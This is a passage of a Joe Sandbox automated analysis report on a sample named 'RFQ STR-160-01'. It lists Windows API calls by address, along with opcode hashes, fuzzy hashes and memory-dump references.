              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Window$Long
              • String ID:
              • API String ID: 847901565-0
              • Opcode ID: 62fe8c26f86002e5f360c8d01b30e33fd122272f630aadf5cf3016a95eb137e9
              • Instruction ID: 5003f9b5b2b925d8253ee0df0b639c20c60ca331c481b4f164c5938dc86566cf
              • Opcode Fuzzy Hash: 62fe8c26f86002e5f360c8d01b30e33fd122272f630aadf5cf3016a95eb137e9
              • Instruction Fuzzy Hash: 02117235605A25AFCB109F28EC04EAA3BA6AF46370B155B24F835DB2F0D7309951DF50
              APIs
              • SendMessageW.USER32(?,00001060,?,00000004), ref: 006256BB
              • _wcslen.LIBCMT ref: 006256CD
              • _wcslen.LIBCMT ref: 006256D8
              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00625816
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: MessageSend_wcslen
              • String ID:
              • API String ID: 455545452-0
              • Opcode ID: eb3219b95323617841a1e88a01c2901bc0e6513b1d23d060eb4f12c5e0b3737e
              • Instruction ID: f7d98a430537ab105f9578ac62f68d1bae2d3b01ed628787db44f9a0d59430d8
              • Opcode Fuzzy Hash: eb3219b95323617841a1e88a01c2901bc0e6513b1d23d060eb4f12c5e0b3737e
              • Instruction Fuzzy Hash: 83110331A00E2896DF309F61EC85AEE77ADFF51360F10802AF916D6181E770DA81CF60
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6bb694a57a184a6554e8a42e2c0eed100decfa5ff9c96de322b43f690cff0290
              • Instruction ID: 7cf20aae16ee57d7a6f324874fff88894bf9309cc5b377fae488097b8ffd3f46
              • Opcode Fuzzy Hash: 6bb694a57a184a6554e8a42e2c0eed100decfa5ff9c96de322b43f690cff0290
              • Instruction Fuzzy Hash: 7D018FB2205E167EF72116F86CC5F276A2DFF823B8F35132DF522911D6DB608C4081A4
              APIs
              • SendMessageW.USER32(?,000000B0,?,?), ref: 005F1A47
              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005F1A59
              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005F1A6F
              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005F1A8A
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: MessageSend
              • String ID:
              • API String ID: 3850602802-0
              • Opcode ID: 2932035893fbcbf397877fa0b72b47fb14f7824b0de3caec1a1cfad4d0c1a1b2
              • Instruction ID: a4e8e3f5094edc98476cd4b1124d54af1209c5410ff2387b30642c6489fffe3c
              • Opcode Fuzzy Hash: 2932035893fbcbf397877fa0b72b47fb14f7824b0de3caec1a1cfad4d0c1a1b2
              • Instruction Fuzzy Hash: 1F11393AD01219FFEB10DBA5CD85FADBB79FB08750F200091EA01B7290D6716E50DB98
              APIs
              • GetCurrentThreadId.KERNEL32 ref: 005FE1FD
              • MessageBoxW.USER32(?,?,?,?), ref: 005FE230
              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 005FE246
              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 005FE24D
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
              • String ID:
              • API String ID: 2880819207-0
              • Opcode ID: beffa70bf1587798639c4dff640ce38a87bc8322bdd818be8534f938b56fe7cf
              • Instruction ID: ac8b2157108129b5305d9fcfa85b17c0c2faf26fac408ae93d325e5619b5e258
              • Opcode Fuzzy Hash: beffa70bf1587798639c4dff640ce38a87bc8322bdd818be8534f938b56fe7cf
              • Instruction Fuzzy Hash: 9E112B76904658BBD7119FA8DC0AAAE7FAEBB46320F144615F915E3390E6B4CD0087A0
              APIs
              • CreateThread.KERNEL32(00000000,?,005BCFF9,00000000,00000004,00000000), ref: 005BD218
              • GetLastError.KERNEL32 ref: 005BD224
              • __dosmaperr.LIBCMT ref: 005BD22B
              • ResumeThread.KERNEL32(00000000), ref: 005BD249
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Thread$CreateErrorLastResume__dosmaperr
              • String ID:
              • API String ID: 173952441-0
              • Opcode ID: fec149c4794ab1f47b6d6417fb0b3d0074e52c4b89bd4b204020dd2763a92fd1
              • Instruction ID: 4b5bb8a212d4671257cd30122390b5f4641561f037ba2b2240b99dbdc1c648b5
              • Opcode Fuzzy Hash: fec149c4794ab1f47b6d6417fb0b3d0074e52c4b89bd4b204020dd2763a92fd1
              • Instruction Fuzzy Hash: 8B01C43A4056057BCB215BA5DC0ABEEBE79FFC1330F100219F925921D0EB71A901C7B0
              APIs
              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0059604C
              • GetStockObject.GDI32(00000011), ref: 00596060
              • SendMessageW.USER32(00000000,00000030,00000000), ref: 0059606A
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CreateMessageObjectSendStockWindow
              • String ID:
              • API String ID: 3970641297-0
              • Opcode ID: d5a50bbc3a54eaa6ae9f85e345f39f40f06fe5f37ea5ad1657b22130f8f52bfb
              • Instruction ID: 48fca3d14962ab425f04fd2d6e36b25a439ddc2e4964708e5c5b964943b6769c
              • Opcode Fuzzy Hash: d5a50bbc3a54eaa6ae9f85e345f39f40f06fe5f37ea5ad1657b22130f8f52bfb
              • Instruction Fuzzy Hash: 2D116D72501909BFEF224FA49C98EEABF6AFF193A4F041216FA1452110D7329C60DBA1
              APIs
              • ___BuildCatchObject.LIBVCRUNTIME ref: 005B3B56
                • Part of subcall function 005B3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 005B3AD2
                • Part of subcall function 005B3AA3: ___AdjustPointer.LIBCMT ref: 005B3AED
              • _UnwindNestedFrames.LIBCMT ref: 005B3B6B
              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 005B3B7C
              • CallCatchBlock.LIBVCRUNTIME ref: 005B3BA4
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
              • String ID:
              • API String ID: 737400349-0
              • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
              • Instruction ID: 2f23d474ebab65d64d30da74804694ecf949dde6696eddbcbedd89c89231fcff
              • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
              • Instruction Fuzzy Hash: 9A01E932100149BBDF126E95CC4AEEB7F69FF98754F054014FE4866121D732E961EBA0
              APIs
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,005913C6,00000000,00000000,?,005C301A,005913C6,00000000,00000000,00000000,?,005C328B,00000006,FlsSetValue), ref: 005C30A5
              • GetLastError.KERNEL32(?,005C301A,005913C6,00000000,00000000,00000000,?,005C328B,00000006,FlsSetValue,00632290,FlsSetValue,00000000,00000364,?,005C2E46), ref: 005C30B1
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,005C301A,005913C6,00000000,00000000,00000000,?,005C328B,00000006,FlsSetValue,00632290,FlsSetValue,00000000), ref: 005C30BF
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: LibraryLoad$ErrorLast
              • String ID:
              • API String ID: 3177248105-0
              • Opcode ID: 7bfce9cf4d3ecc1923ce227a221c9d1061b9e3f60b62534ea86e0daaaa541db9
              • Instruction ID: 65381fd0f120fa1c347cf518ab11a98cfe0e9bd8170ad2c9cb09fdb8352332ae
              • Opcode Fuzzy Hash: 7bfce9cf4d3ecc1923ce227a221c9d1061b9e3f60b62534ea86e0daaaa541db9
              • Instruction Fuzzy Hash: 8501B537301626AFC7314AA8AC48E677F99BF05771B108628E906F7150D721D90586D0
              APIs
              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 005F747F
              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 005F7497
              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 005F74AC
              • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 005F74CA
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Type$Register$FileLoadModuleNameUser
              • String ID:
              • API String ID: 1352324309-0
              • Opcode ID: 1de0a920fe381a32726932cb3a8228cb21dc4ffe3d46a91314af9f5f2aeea7bb
              • Instruction ID: a0246b82d66012af498ca36148ce40cf0770de782ac349330ec8156920821fea
              • Opcode Fuzzy Hash: 1de0a920fe381a32726932cb3a8228cb21dc4ffe3d46a91314af9f5f2aeea7bb
              • Instruction Fuzzy Hash: D71179B1205719ABEB209F14EC0DFA67FF8FB08B10F108569A626D7191D7B4E904DBA1
              APIs
              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,005FACD3,?,00008000), ref: 005FB0C4
              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,005FACD3,?,00008000), ref: 005FB0E9
              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,005FACD3,?,00008000), ref: 005FB0F3
              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,005FACD3,?,00008000), ref: 005FB126
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CounterPerformanceQuerySleep
              • String ID:
              • API String ID: 2875609808-0
              • Opcode ID: ba9698f83370d60851b9ee6e35391369987eb2fa954fecc054cf63cb628aee30
              • Instruction ID: 0c1148760bd87494e111936aab206b556ad5a8dce5cae63e6a46e12e2a24b6ac
              • Opcode Fuzzy Hash: ba9698f83370d60851b9ee6e35391369987eb2fa954fecc054cf63cb628aee30
              • Instruction Fuzzy Hash: D6117930C00A2DEBEF10AFA4E969AFEBF78FF09321F004486DA41B2281CB345651CB51
              APIs
              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 005F2DC5
              • GetWindowThreadProcessId.USER32(?,00000000), ref: 005F2DD6
              • GetCurrentThreadId.KERNEL32 ref: 005F2DDD
              • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 005F2DE4
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
              • String ID:
              • API String ID: 2710830443-0
              • Opcode ID: 6a5de6b60e7ec05e2ea6ef1c3f87d71a74bb8b767c87a400161bfd17b50a90a9
              • Instruction ID: 569ed9e500a43f7d8271deda644f0ff55ac45d48f9014991f21869b903a9d7b4
              • Opcode Fuzzy Hash: 6a5de6b60e7ec05e2ea6ef1c3f87d71a74bb8b767c87a400161bfd17b50a90a9
              • Instruction Fuzzy Hash: 5FE06DB1101A287BE7301B629C0EEFB7E6EFB42BB1F401115B205D50809AA88842D6B0
              APIs
                • Part of subcall function 005A9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 005A9693
                • Part of subcall function 005A9639: SelectObject.GDI32(?,00000000), ref: 005A96A2
                • Part of subcall function 005A9639: BeginPath.GDI32(?), ref: 005A96B9
                • Part of subcall function 005A9639: SelectObject.GDI32(?,00000000), ref: 005A96E2
              • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00628887
              • LineTo.GDI32(?,?,?), ref: 00628894
              • EndPath.GDI32(?), ref: 006288A4
              • StrokePath.GDI32(?), ref: 006288B2
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
              • String ID:
              • API String ID: 1539411459-0
              • Opcode ID: 06be0d764ea063b8037840cd976a4cab5d21286500c4650511411009784376ba
              • Instruction ID: 9095567f17651fb9c7ae3f316e06927b8b2d0c7313caefd6f44e43991c40f25b
              • Opcode Fuzzy Hash: 06be0d764ea063b8037840cd976a4cab5d21286500c4650511411009784376ba
              • Instruction Fuzzy Hash: 50F05435041969FAEB225F94AC0DFCE3F5A6F06320F048100FA11651E1C7B55511CFE5
              APIs
              • GetSysColor.USER32(00000008), ref: 005A98CC
              • SetTextColor.GDI32(?,?), ref: 005A98D6
              • SetBkMode.GDI32(?,00000001), ref: 005A98E9
              • GetStockObject.GDI32(00000005), ref: 005A98F1
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Color$ModeObjectStockText
              • String ID:
              • API String ID: 4037423528-0
              • Opcode ID: 723940cbcba8cdac05430562b9d66b982e341e1d3f0fb1dbe6460f8972429fc2
              • Instruction ID: 7aaa9e510675ab8198d742ecd5b660efcca51c51b6ac6a74207a7874a57870e0
              • Opcode Fuzzy Hash: 723940cbcba8cdac05430562b9d66b982e341e1d3f0fb1dbe6460f8972429fc2
              • Instruction Fuzzy Hash: A4E06531244A94AEDB315B79AC0DBDD3F12BB16336F049219F6F5540E1C37146519B11
              APIs
              • GetCurrentThread.KERNEL32 ref: 005F1634
              • OpenThreadToken.ADVAPI32(00000000,?,?,?,005F11D9), ref: 005F163B
              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,005F11D9), ref: 005F1648
              • OpenProcessToken.ADVAPI32(00000000,?,?,?,005F11D9), ref: 005F164F
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CurrentOpenProcessThreadToken
              • String ID:
              • API String ID: 3974789173-0
              • Opcode ID: 61f3ec583aae8a305f4d47368f699872c630031e996917c5dc11d8e78d4b1ca4
              • Instruction ID: 79c233b10217a31db921fa0df345398200dd72f7eadbdb90cbe526f3ca3a177a
              • Opcode Fuzzy Hash: 61f3ec583aae8a305f4d47368f699872c630031e996917c5dc11d8e78d4b1ca4
              • Instruction Fuzzy Hash: FBE08631602A11DBD7301FA09D0DF9A3F7DBF447A1F145808F345CA080D6384442C758
              APIs
              • GetDesktopWindow.USER32 ref: 005ED858
              • GetDC.USER32(00000000), ref: 005ED862
              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 005ED882
              • ReleaseDC.USER32(?), ref: 005ED8A3
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CapsDesktopDeviceReleaseWindow
              • String ID:
              • API String ID: 2889604237-0
              • Opcode ID: b39f0831727bf9809c0a739d3a53d4e34956402db496e6841202269bf2681d18
              • Instruction ID: 19f16397ae64d1a5dc4b0538880fd634d14b67b412e6657f6bbe85ae46afcdef
              • Opcode Fuzzy Hash: b39f0831727bf9809c0a739d3a53d4e34956402db496e6841202269bf2681d18
              • Instruction Fuzzy Hash: F6E01AB1800605DFCF51AFA0D80C66DBFB2FB08720F109409F846E7250D7384902AF50
              APIs
              • GetDesktopWindow.USER32 ref: 005ED86C
              • GetDC.USER32(00000000), ref: 005ED876
              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 005ED882
              • ReleaseDC.USER32(?), ref: 005ED8A3
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CapsDesktopDeviceReleaseWindow
              • String ID:
              • API String ID: 2889604237-0
              • Opcode ID: d81591147b05d797af840e475a83c09f1f7a17cf9ea378894c4536bac82544c6
              • Instruction ID: f46251221d0e9f1b929719cf6a2106348e4ecebeaf2abe50fa48844ad00b9fa8
              • Opcode Fuzzy Hash: d81591147b05d797af840e475a83c09f1f7a17cf9ea378894c4536bac82544c6
              • Instruction Fuzzy Hash: B2E09A75C00605DFCF61AFA0D80C66DBFB6FB48721B149449F94AE7250D73959029F50
              APIs
                • Part of subcall function 00597620: _wcslen.LIBCMT ref: 00597625
              • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00604ED4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Connection_wcslen
              • String ID: *$LPT
              • API String ID: 1725874428-3443410124
              • Opcode ID: 33cefdcf9eac6beabef52b0694e4770f600a13823aa69a490b5eeed435a9415a
              • Instruction ID: e6bf2f59295f0ba39985e3b50a11c1d40b4d8ae42db100ce5c7e727ac0881add
              • Opcode Fuzzy Hash: 33cefdcf9eac6beabef52b0694e4770f600a13823aa69a490b5eeed435a9415a
              • Instruction Fuzzy Hash: 519175B59442059FCB28DF54C484EAABBF6BF88304F158099E5069F3A2DB31ED45CB51
              APIs
              • CharUpperBuffW.USER32(005E569E,00000000,?,0062CC08,?,00000000,00000000), ref: 006178DD
                • Part of subcall function 00596B57: _wcslen.LIBCMT ref: 00596B6A
              • CharUpperBuffW.USER32(005E569E,00000000,?,0062CC08,00000000,?,00000000,00000000), ref: 0061783B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
